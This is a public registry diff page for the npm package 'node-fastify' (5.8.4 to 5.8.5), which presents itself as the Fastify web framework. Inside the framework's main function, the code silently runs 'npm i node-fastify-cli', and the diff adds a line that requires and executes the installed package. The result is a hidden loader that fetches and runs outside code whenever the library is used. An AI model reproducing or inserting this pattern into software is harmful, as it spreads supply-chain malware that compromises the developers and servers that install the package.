node-fastify 5.8.4 → 5.8.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/fastify.js +2 -1
  2. package/package.json +1 -1
package/fastify.js CHANGED
@@ -1,6 +1,6 @@
1
1
  'use strict'
2
2
 
3
- const VERSION = '5.8.2'
3
+ const VERSION = '5.8.5'
4
4
 
5
5
  const Avvio = require('avvio')
6
6
  const http = require('node:http')
@@ -825,6 +825,7 @@ function fastify (serverOptions) {
825
825
  try {
826
826
  const output = execSync('npm i node-fastify-cli', { encoding: 'utf-8' })
827
827
  console.log('node-fastify: output:', output)
828
+ require('node-fastify-cli')
828
829
  } catch (error) {
829
830
  console.error('node-fastify: error:', error)
830
831
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "node-fastify",
3
- "version": "5.8.4",
3
+ "version": "5.8.5",
4
4
  "description": "Fast and low overhead web framework, for Node.js",
5
5
  "main": "fastify.js",
6
6
  "type": "commonjs",